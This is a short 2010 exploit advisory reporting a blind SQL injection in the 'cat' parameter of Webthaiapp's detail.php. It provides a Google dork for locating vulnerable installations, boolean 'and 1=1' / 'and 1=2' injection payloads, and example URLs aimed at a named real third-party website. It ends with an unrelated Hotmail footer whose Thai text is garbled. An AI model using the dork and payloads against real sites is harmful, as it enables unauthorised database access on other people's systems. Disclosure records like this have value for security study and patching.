Webthaiapp suffers from a remote blind SQL injection vulnerability.
d791fb65ed72989f913d1a837519395709e8614fb9ae750b1d9c8aa275c151b7
--==+==================================================+==--
--==+ Webthaiapp detail.php(cat) Blind Sql injection
Vulnerability +==--
--==+==================================================+==--
Date : 30-04-2010
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
AUTHOR: Xelenonz
Homepage : www.thaishadow.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Application : Webthaiapp
Vendor : http://www.Webthaiapp.com/
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DORK (google): "inurl:catalog/product/detail.php?cat="
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DESCRIPTION:
EXPLOITS:
detail.php?cat=[valid catid]+and+1=1 << TRUE
detail.php?cat=[valid catid]+and+1=2 << False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Example
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=1
<< True
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=2
<< False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Special Thx : Krit admin@thaishadow,Thaishadow.com
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_________________________________________________________________
Hotmail: ÍÕàÁÅ·Õèàª×èͶ×Íä´é«Öè§ÁÒ¾ÃéÍÁ¡Ñº¡Òûéͧ¡Ñ¹ÍÕàÁÅ¢ÂзÕèÁÕ»ÃÐÊÔ·¸ÔÀÒ¾
https://signup.live.com/signup.aspx?id=60969